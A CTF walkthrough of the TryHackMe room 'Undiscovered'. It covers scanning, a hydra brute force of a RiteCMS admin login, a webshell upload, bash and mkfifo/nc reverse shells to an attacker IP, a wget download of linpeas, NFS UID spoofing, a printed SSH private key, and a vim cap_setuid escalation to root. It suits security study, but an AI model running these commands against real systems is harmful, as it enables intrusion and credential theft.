TryHackMe: Undiscovered https://tryhackme.com/room/undiscoveredup
Enumeration
Break out rustscan after connecting to the TryHackMe VPN.
$ rustscan -a undiscovered -- -sC -sV -oA undiscovered -A -v
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/home/tj/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.46.19:22
Open 10.10.46.19:80
Open 10.10.46.19:111
Open 10.10.46.19:2049
Open 10.10.46.19:43839
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-30 13:18 GMT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:18
Completed NSE at 13:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:18
Completed NSE at 13:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:18
Completed NSE at 13:18, 0.00s elapsed
Initiating Ping Scan at 13:18
Scanning 10.10.46.19 [2 ports]
Completed Ping Scan at 13:18, 0.03s elapsed (1 total hosts)
Initiating Connect Scan at 13:18
Scanning undiscovered.thm (10.10.46.19) [5 ports]
Discovered open port 111/tcp on 10.10.46.19
Discovered open port 80/tcp on 10.10.46.19
Discovered open port 22/tcp on 10.10.46.19
Discovered open port 2049/tcp on 10.10.46.19
Discovered open port 43839/tcp on 10.10.46.19
Completed Connect Scan at 13:18, 0.03s elapsed (5 total ports)
Initiating Service scan at 13:18
Scanning 5 services on undiscovered.thm (10.10.46.19)
Completed Service scan at 13:19, 6.32s elapsed (5 services on 1 host)
NSE: Script scanning 10.10.46.19.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 1.25s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.20s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
Nmap scan report for undiscovered.thm (10.10.46.19)
Host is up, received syn-ack (0.032s latency).
Scanned at 2020-11-30 13:18:54 GMT for 8s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:76:81:49:50:bb:6f:4f:06:15:cc:08:88:01:b8:f0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0m4DmvKkWm3OoELtyKxq4G9yM29DEggmEsfKv2fzZh1G6EiPS/pKPQV/u8InqwPyyJZv82Apy4pVBYL7KJTTZkxBLbrJplJ6YnZD5xZMd8tf4uLw5ZCilO6oLDKH0pchPmQ2x2o5x2Xwbzfk4KRbwC+OZ4f1uCageOptlsR1ruM7boiHsPnDO3kCujsTU/4L19jJZMGmJZTpvRfcDIhelzFNxCMwMUwmlbvhiCf8nMwDaBER2HHP7DKXF95uSRJWKK9eiJNrk0h/K+3HkP2VXPtcnLwmbPhzVHDn68Dt8AyrO2d485j9mLusm4ufbrUXSyfM9JxYuL+LDrqgtUxxP
| 256 2b:39:d9:d9:b9:72:27:a9:32:25:dd:de:e4:01:ed:8b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAcr7A7L54JP/osGx6nvDs5y3weM4uwfT2iCJbU5HPdwGHERLCAazmr/ss6tELaj7eNqoB8LaM2AVAVVGQXBhc8=
| 256 2a:38:ce:ea:61:82:eb:de:c4:e0:2b:55:7f:cc:13:bc (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAII9WA55JtThufX7BcByUR5/JGKGYsIlgPxEiS0xqLlIA
80/tcp open http syn-ack Apache httpd 2.4.18
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100021 1,3,4 37168/tcp6 nlockmgr
| 100021 1,3,4 39694/udp6 nlockmgr
| 100021 1,3,4 43839/tcp nlockmgr
| 100021 1,3,4 50295/udp nlockmgr
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
2049/tcp open nfs syn-ack 2-4 (RPC #100003)
43839/tcp open nlockmgr syn-ack 1-4 (RPC #100021)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.38 seconds
22 - ssh
We do not have a username/password so lets skip this for now
80 - HTTP
Nothin interesting souce code
111 - rpc
Here we have a list of services running on server
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100021 1,3,4 37168/tcp6 nlockmgr
| 100021 1,3,4 39694/udp6 nlockmgr
| 100021 1,3,4 43839/tcp nlockmgr
| 100021 1,3,4 50295/udp nlockmgr
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
2049 - NFS
Network file share, but unfortunately showmount is not working ....
$ showmount --exports undiscovered.thm
clnt_create: RPC: Program not registered
$ showmount -e 10.10.46.19
clnt_create: RPC: Program not registered
43839 - nlockmgr
This is the lock manager for NFS, nothing really interesting
Exploring HTTP ( port 80 )
Nothing much obvious, lets take a look at the background image incase there is any stego
$ file bg.jpg
bg.jpg: JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, comment: "Lavc58.11.101", baseline, precision 8, 1920x1080, components 3
$ exiftool bg.jpg
ExifTool Version Number : 12.10
File Name : bg.jpg
Directory : .
File Size : 42 kB
File Modification Date/Time : 2019:01:15 08:51:52+00:00
File Access Date/Time : 2020:11:30 13:30:53+00:00
File Inode Change Date/Time : 2020:11:22 23:26:28+00:00
File Permissions : rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.02
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Comment : Lavc58.11.101
Image Width : 1920
Image Height : 1080
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 1920x1080
Megapixels : 2.1
$ binwalk bg.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.02
$ steghide extract -sf bg.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!
Nothin interesting there, lets run gobuster against it.
$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://undiscovered.thm -x php,txt,html,htm,asp,bak,zip
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://undiscovered.thm
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,html,htm,asp,bak,zip,php
[+] Timeout: 10s
===============================================================
2020/11/30 13:35:08 Starting gobuster
===============================================================
With the above I am looking for some file extensions as well that may return something, apart from the below though there wasnt anything flagged up.
/index.php (Status: 200)
/images (Status: 301)
hmmm, ok so lately there have been some fuzzing rooms and sub domains rooms so lets have try with gobuster looking for vhosts
gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://undiscovered.thm -r 200
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://undiscovered.thm
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/11/30 13:59:02 Starting gobuster
===============================================================
Found: manager.undiscovered.thm (Status: 200) [Size: 4584]
Found: dashboard.undiscovered.thm (Status: 200) [Size: 4626]
Found: deliver.undiscovered.thm (Status: 200) [Size: 4650]
Found: newsite.undiscovered.thm (Status: 200) [Size: 4584]
Found: develop.undiscovered.thm (Status: 200) [Size: 4584]
Found: network.undiscovered.thm (Status: 200) [Size: 4584]
Found: forms.undiscovered.thm (Status: 200) [Size: 4542]
Found: maintenance.undiscovered.thm (Status: 200) [Size: 4668]
Found: view.undiscovered.thm (Status: 200) [Size: 4521]
Found: mailgate.undiscovered.thm (Status: 200) [Size: 4605]
Found: play.undiscovered.thm (Status: 200) [Size: 4521]
Found: start.undiscovered.thm (Status: 200) [Size: 4542]
Found: booking.undiscovered.thm (Status: 200) [Size: 4599]
Found: terminal.undiscovered.thm (Status: 200) [Size: 4605]
Found: gold.undiscovered.thm (Status: 200) [Size: 4521]
Found: internet.undiscovered.thm (Status: 200) [Size: 4605]
OK, we have subdomains here, lets add dashboard and manager to our hosts file
Both appear to goto the same page. So we have RiteCMS site, lets take a look around....
Bugger, getting 404's browsing around, lets break out gobuster again ....
$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://manager.undiscovered.thm -x php,sql,db,bak,asp,htm,html,txt,zip
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://manager.undiscovered.thm
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: asp,htm,txt,zip,php,sql,db,bak,html
[+] Timeout: 10s
===============================================================
2020/11/30 14:07:16 Starting gobuster
===============================================================
/index.php (Status: 200)
Whilst that was running ( wasnt bringing anything back :( ) I jumped into view-source and found a reference to http://deliver.undiscovered.thm/rss
So lets add this to our /etc/hosts and give that a scan....
$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://deliver.undiscovered.thm -x php,sql,db,bak,asp,htm,html,txt,zip
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://deliver.undiscovered.thm
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: db,asp,htm,txt,zip,php,sql,bak,html
[+] Timeout: 10s
===============================================================
2020/11/30 14:10:18 Starting gobuster
===============================================================
/index.php (Status: 200)
/templates (Status: 301)
/media (Status: 301)
/files (Status: 301)
/data (Status: 301)
/cms (Status: 301)
/README.txt (Status: 200)
/js (Status: 301)
/INSTALL.txt (Status: 200)
/LICENSE (Status: 200
.......
SYSTEM REQUIREMENTS
* Apache webserver with mod_rewrite and .htaccess file support enabled
* PHP 5 with PDO and SQLite driver enabled
INSTALLATION
1. Load up the script files to your server
2. Depending on your server configuration you may need to change the write
permissions of the following subdirectories:
* cms/cache (CHMOD 777) - cache directory, needs to be writable if
you want to use the caching feature
* media and images (CHMOD 777) - need to be writable if you want to
use the file uploader
3. Ready! You should now be able to access the index page by browsing to the
address you uploaded RiteCMS (e.g.http://your-domain.tld/path/to/phpsqlitecms/).
To administrate the page, go to http://your-domain.tld/path/to/ritecms/cms/.
The default admin userdata is: username: admin, password: admin.
SECURITY
1. Please change your password asap.
2. To avoid XSS attack, please change the token in CMS/index.php Line 27 (or else if you change the file)
define('TOKEN_SALT', 'monkey');
Change 'monkey' to anything else.
Finally!!!! Something interesting, lets take a look at /cms
/CMS
From the above INSTALL.txt we see that the default username/password is admin/admin.
Worth a try, but as we know the username lets break out hydra
URL: http://deliver.undiscovered.thm/cms/index.php
bODY: username=admin&userpw=admin
Failure: User unknown or password wrong
So our command will be
$ hydra -ladmin -P /usr/share/wordlists/rockyou.txt deliver.undiscovered.thm http-form-post "/cms/index.php:username=^USER^&userpw=^PASS^:User unknown or password wrong" -I -f
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-30 14:50:42
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://deliver.undiscovered.thm:80/cms/index.php:username=^USER^&userpw=^PASS^:User unknown or password wrong
[80][http-post-form] host: deliver.undiscovered.thm login: admin password: [REDACTED]
[STATUS] attack finished for deliver.undiscovered.thm (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-30 14:50:45
/data
Whilst waiting for hydra to brute force the admin password I looked around some of the other directories and under /data found
So lets download these and take a look....
wget -m --no-parent http://deliver.undiscovered.thm/data/
This should mirror the contents of the directory, although it may be a bit messy...
$ ls -R
.:
content 'index.html?C=D;O=A' 'index.html?C=M;O=D' 'index.html?C=S;O=A' userdata
entries 'index.html?C=D;O=D' 'index.html?C=N;O=A' 'index.html?C=S;O=D'
index.html 'index.html?C=M;O=A' 'index.html?C=N;O=D' sql
./sql:
index.html 'index.html?C=M;O=A' 'index.html?C=N;O=D' mysql.initial.sql
'index.html?C=D;O=A' 'index.html?C=M;O=D' 'index.html?C=S;O=A' sqlite.content.initial.sql
'index.html?C=D;O=D' 'index.html?C=N;O=A' 'index.html?C=S;O=D' sqlite.user.initial.sql
Lets use the file command as we are missing some extensions..
$ file *
content: SQLite 3.x database, last written using SQLite version 3011000
entries: SQLite 3.x database, last written using SQLite version 3007015
index.html: HTML document, ASCII text
index.html?C=D;O=A: HTML document, ASCII text
index.html?C=D;O=D: HTML document, ASCII text
index.html?C=M;O=A: HTML document, ASCII text
index.html?C=M;O=D: HTML document, ASCII text
index.html?C=N;O=A: HTML document, ASCII text
index.html?C=N;O=D: HTML document, ASCII text
index.html?C=S;O=A: HTML document, ASCII text
index.html?C=S;O=D: HTML document, ASCII text
sql: directory
userdata: SQLite 3.x database, last written using SQLite version 3011000
$ file */*
sql/index.html: HTML document, ASCII text
sql/index.html?C=D;O=A: HTML document, ASCII text
sql/index.html?C=D;O=D: HTML document, ASCII text
sql/index.html?C=M;O=A: HTML document, ASCII text
sql/index.html?C=M;O=D: HTML document, ASCII text
sql/index.html?C=N;O=A: HTML document, ASCII text
sql/index.html?C=N;O=D: HTML document, ASCII text
sql/index.html?C=S;O=A: HTML document, ASCII text
sql/index.html?C=S;O=D: HTML document, ASCII text
sql/mysql.initial.sql: ASCII text, with very long lines
sql/sqlite.content.initial.sql: UTF-8 Unicode text, with very long lines
sql/sqlite.user.initial.sql: ASCII text
Looks like we have some SQLite files, we can break out sqlitebrowser to take a look at these. First one I ma looking at is userdata
Here we have a password for the admin user, lets see if we can crack it...
Crackstation does not have it and can not identify it so lets try https://md5hashing.net/hash_type_checker which identifies it as base64 or HEX, neither of which appear to be correct...
Ok well Hydra cracked the password so we are in
User flag
As we are now logged into RiteCMS we can look around to see what we can do. Under Administration » File Manager we can upload some files, so first I upload a webshell
Here we execute /bin/bash -c 'bash -i >& /dev/tcp/10.9.5.198/4444 0>&1' and in our terminal we execute $ nc -lvnp 4444 to get a reverseshell. Lets do our usual to get a nice tty shell...
listening on [any] 4444 ...
connect to [10.9.5.198] from (UNKNOWN) [10.10.46.19] 45750
bash: cannot set terminal process group (1245): Inappropriate ioctl for device
bash: no job control in this shell
www-data@undiscovered:/var/www/deliver.undiscovered.thm/files$ python -c 'import pty;pty.spawn("/bin/bash")'
<hm/files$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@undiscovered:/var/www/deliver.undiscovered.thm/files$ export TERM=xterm
<www/deliver.undiscovered.thm/files$ export TERM=xterm
www-data@undiscovered:/var/www/deliver.undiscovered.thm/files$ ^Z
[1]+ Stopped nc -lvnp 4444
$ stty raw -echo; fg
nc -lvnp 4444
www-data@undiscovered:/var/www/deliver.undiscovered.thm/files$
Ok lets take a look at /home and see if we can see the flag
$ ls -R /home
/home:
leonard william
ls: cannot open directory '/home/leonard': Permission denied
ls: cannot open directory '/home/william': Permission denied
Hmmm not what we wanted, lets see if we can sudo
www-data@undiscovered:/var/www/deliver.undiscovered.thm/files$ sudo -l
[sudo] password for www-data:
Sorry, try again.
Not much help there, what group are we in ?
www-data@undiscovered:/var/www/deliver.undiscovered.thm/files$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Ok loosk like we need to privesc to get any further. A quick ls under /var/www doesnt reveal anything interesting..
www-data@undiscovered:/var/www$ ls *
booking.undiscovered.thm:
index.php style.css
dashboard.undiscovered.thm:
index.php style.css
deliver.undiscovered.thm:
CHANGELOG_RiteCMS.txt LICENSE cms files js style.css
INSTALL.txt README.txt data index.php media templates
develop.undiscovered.thm:
index.php style.css
forms.undiscovered.thm:
index.php style.css
gold.undiscovered.thm:
index.php style.css
html:
index.php
internet.undiscovered.thm:
index.php style.css
mailgate.undiscovered.thm:
index.php style.css
maintenance.undiscovered.thm:
index.php style.css
manager.undiscovered.thm:
index.php style.css
network.undiscovered.thm:
index.php style.css
newsite.undiscovered.thm:
index.php style.css
play.undiscovered.thm:
index.php style.css
resources.undiscovered.thm:
index.php style.css
start.undiscovered.thm:
index.php style.css
terminal.undiscovered.thm:
index.php style.css
undiscovered.thm:
images index.php
view.undiscovered.thm:
index.php style.css
Lets get linpeas.sh onto the box and give it a run...
www-data@undiscovered:/var/www$ cd /tmp
www-data@undiscovered:/tmp$ wget http://10.9.5.198:8000/linpeas.sh
--2020-11-30 23:00:32-- http://10.9.5.198:8000/linpeas.sh
Connecting to 10.9.5.198:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 223835 (219K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 218.59K --.-KB/s in 0.1s
2020-11-30 23:00:32 (1.50 MB/s) - 'linpeas.sh' saved [223835/223835]
www-data@undiscovered:/tmp$ sh linpeas.sh | tee linpeas.log
Intersting bits
OS: Linux version 4.4.0-189-generic (buildd@lgw01-amd64-047) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12) ) #219-Ubuntu SMP Tue Aug 11 12:26:50 UTC 2020
[+] NFS exports?
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
/home/william *(rw,root_squash)
[+] Capabilities
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/vim.basic = cap_setuid+ep
[+] Unexpected folders in root
/lib32
/libx32
VIM
Looking at the output VIM has cap_setuid+ep so checking GTFOPBins..
www-data@undiscovered:/tmp$ vim
bash: /usr/bin/vim: Permission denied
Bugger, can not run vim or vi
NFS
Ok so we have the directory exported so lets try mounting NFS
$ mkdir nfs
$ sudo mount -tnfs undiscovered:/home/william nfs
$ ls nfs
ls: cannot open directory 'nfs': Permission denied
$ sudo !!
sudo ls nfs
ls: cannot open directory 'nfs': Permission denied
No joy there .... looking at the output from /etc/passwd we can see the below users
william:x:3003:3003::/home/william:/bin/bash
leonard:x:1002:1002::/home/leonard:/bin/bash
Lets try and add william to our system and mount NFS for him
$ sudo useradd -u 3003 william -s /bin/bash
$ sudo su - william
su: warning: cannot change directory to /home/william: No such file or directory
$ ls nfs
admin.sh script user.txt
$ cat nfs/user.txt
THM{[REDACTED]}
Root flag
Now that we have the user.txt we can also see a admin.sh and script
$ file *
admin.sh: POSIX shell script, ASCII text executable
script: setuid, setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=6e324a50ee883a60b395cdd1c6a64f96e6546736, not stripped
user.txt: ASCII text
$ cat admin.sh
#!/bin/sh
echo "[i] Start Admin Area!"
echo "[i] Make sure to keep this script safe from anyone else!"
exit 0
Ok, unfortunately we do not have write access to admin.sh
$ ls -l
-rwxr-xr-x 1 root root 128 Sep 4 14:43 admin.sh
However we can move it and replace it with out own admin.sh
$ mv admin.sh admin1.sh
$ vi admin.sh
$ chmod 755 admin.sh
$ ls -l
total 24
-rwxr-xr-x 1 root root 128 Sep 4 14:43 admin1.sh
-rwxr-xr-x 1 william william 53 Nov 30 15:22 admin.sh
-rwsrwsr-x 1 nobody 4294967294 8776 Sep 4 15:11 script
-rw-r----- 1 root william 38 Sep 9 17:36 user.txt
$ cat admin.sh
#!/bin/bash
bash -i >& /dev/tcp/10.9.5.198/4455 0>&1
Not sure if this gets called but incase have setup nc -nlvp 4455 in terminal. I then made the directory accessible to everyone running chmod 777 against the mounted directory. I am now able to enter it on the server.
www-data@undiscovered:/home$ ls -l
total 8
drwxr-x--- 5 leonard leonard 4096 Sep 9 21:45 leonard
drwxrwxrwx 4 william william 4096 Nov 30 23:22 william
www-data@undiscovered:/home$ cd william/
www-data@undiscovered:/home/william$ ls -l
total 24
-rwxrwxrwx 1 william william 53 Nov 30 23:22 admin.sh
-rwxr-xr-x 1 root root 128 Sep 4 21:43 admin1.sh
-rwsrwsr-x 1 leonard leonard 8776 Sep 4 22:11 script
-rw-r----- 1 root william 38 Sep 10 00:36 user.txt
Running ./script runs admin.sh and we get a call back to our listener but as www-data which is not what we want. Running strings across the file it looks like it cats a file in /home/leonad
UH-P
/bin/catH
/home/lH
eonard/
dH34%(
AWAVA
AUATL
[]A\A]A^A_
./admin.sh
;*3$"
Lets try something out ....
www-data@undiscovered:/home/william$ ./script .ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAwErxDUHfYLbJ6rU+r4oXKdIYzPacNjjZlKwQqK1I4JE93rJQ
HEhQlurt1Zd22HX2zBDqkKfvxSxLthhhArNLkm0k+VRdcdnXwCiQqUmAmzpse9df
YU/UhUfTu399lM05s2jYD50A1IUelC1QhBOwnwhYQRvQpVmSxkXBOVwFLaC1AiMn
SqoMTrpQPxXlv15Tl86oSu0qWtDqqxkTlQs+xbqzySe3y8yEjW6BWtR1QTH5s+ih
hT70DzwhCSPXKJqtPbTNf/7opXtcMIu5o3JW8Zd/KGX/1Vyqt5ememrwvaOwaJrL
+ijSn8sXG8ej8q5FidU2qzS3mqasEIpWTZPJ0QIDAQABAoIBAHqBRADGLqFW0lyN
C1qaBxfFmbc6hVql7TgiRpqvivZGkbwGrbLW/0Cmes7QqA5PWOO5AzcVRlO/XJyt
+1/VChhHIH8XmFCoECODtGWlRiGenu5mz4UXbrVahTG2jzL1bAU4ji2kQJskE88i
72C1iphGoLMaHVq6Lh/S4L7COSpPVU5LnB7CJ56RmZMAKRORxuFw3W9B8SyV6UGg
Jb1l9ksAmGvdBJGzWgeFFj82iIKZkrx5Ml4ZDBaS39pQ1tWfx1wZYwWw4rXdq+xJ
xnBOG2SKDDQYn6K6egW2+aNWDRGPq9P17vt4rqBn1ffCLtrIN47q3fM72H0CRUJI
Ktn7E2ECgYEA3fiVs9JEivsHmFdn7sO4eBHe86M7XTKgSmdLNBAaap03SKCdYXWD
BUOyFFQnMhCe2BgmcQU0zXnpiMKZUxF+yuSnojIAODKop17oSCMFWGXHrVp+UObm
L99h5SIB2+a8SX/5VIV2uJ0GQvquLpplSLd70eVBsM06bm1GXlS+oh8CgYEA3cWc
TIJENYmyRqpz3N1dlu3tW6zAK7zFzhTzjHDnrrncIb/6atk0xkwMAE0vAWeZCKc2
ZlBjwSWjfY9Hv/FMdrR6m8kXHU0yvP+dJeaF8Fqg+IRx/F0DFN2AXdrKl+hWUtMJ
iTQx6sR7mspgGeHhYFpBkuSxkamACy9SzL6Sdg8CgYATprBKLTFYRIUVnZdb8gPg
zWQ5mZfl1leOfrqPr2VHTwfX7DBCso6Y5rdbSV/29LW7V9f/ZYCZOFPOgbvlOMVK
3RdiKp8OWp3Hw4U47bDJdKlK1ZodO3PhhRs7l9kmSLUepK/EJdSu32fwghTtl0mk
OGpD2NIJ/wFPSWlTbJk77QKBgEVQFNiowi7FeY2yioHWQgEBHfVQGcPRvTT6wV/8
jbzDZDS8LsUkW+U6MWoKtY1H1sGomU0DBRqB7AY7ON6ZyR80qzlzcSD8VsZRUcld
sjD78mGZ65JHc8YasJsk3br6p7g9MzbJtGw+uq8XX0/XlDwsGWCSz5jKFDXqtYM+
cMIrAoGARZ6px+cZbZR8EA21dhdn9jwds5YqWIyri29wQLWnKumLuoV7HfRYPxIa
bFHPJS+V3mwL8VT0yI+XWXyFHhkyhYifT7ZOMb36Zht8yLco9Af/xWnlZSKeJ5Rs
LsoGYJon+AJcw9rQaivUe+1DhaMytKnWEv/rkLWRIaiS+c9R538=
-----END RSA PRIVATE KEY-----
Taking that key we are able to ssh as leonard
$ ssh -i leo leonard@undiscovered
load pubkey "leo": invalid format
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-189-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Fri Sep 4 22:57:43 2020 from 192.168.68.129
leonard@undiscovered:~$
Now we are leonard we are able to run vim
So lets look back through our notes and see that vim had cap_setuid+ep set, so lets try our GTFOBins again
vim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
Damn that sucks.... let's take a look .viminfo to see if there is anything interest recorded from that ...
-' 1 0 :py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
-' 3 0 :py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
-' 1 0 :py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
-' 3 0 :py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
-' 1 0 :py3 import os;os.setuid(0);os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.68.129 1337 >/tmp/f")
-' 1 0 :py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
-' 3 0 :py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
-' 1 0 :py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
-' 3 0 :py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
-' 3 0 :py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
# History of marks within files (newest to oldest):
> :py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
" 3 0
^ 3 1
. 3 0
+ 3 0
> :py3 import os;os.setuid(0);os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.68.129 1337 >/tmp/f")
" 1 0
> :py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")
" 1 0
^ 3 0
. 2 2
+ 2 2
Hmmm very odd, above our requests looks like a reverse shell.... lets try that
leonard@undiscovered:~$ vim -c ':py3 import os;os.setuid(0);os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.5.198 4455 >/tmp/f")'
we get the output
rm: cannot remove '/tmp/f': No such file or directory
and in our listener we get
$ nc -lvnp 4455
listening on [any] 4455 ...
connect to [10.9.5.198] from (UNKNOWN) [10.10.46.19] 45602
# id
